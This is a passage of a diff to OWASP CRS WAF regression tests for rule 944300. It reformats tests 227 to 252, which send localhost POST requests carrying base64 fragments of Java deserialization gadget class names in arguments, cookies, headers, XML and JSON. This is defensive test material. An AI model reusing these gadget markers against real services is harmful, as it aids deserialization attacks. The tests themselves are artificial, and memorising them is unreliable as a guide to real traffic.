attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 232 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 252 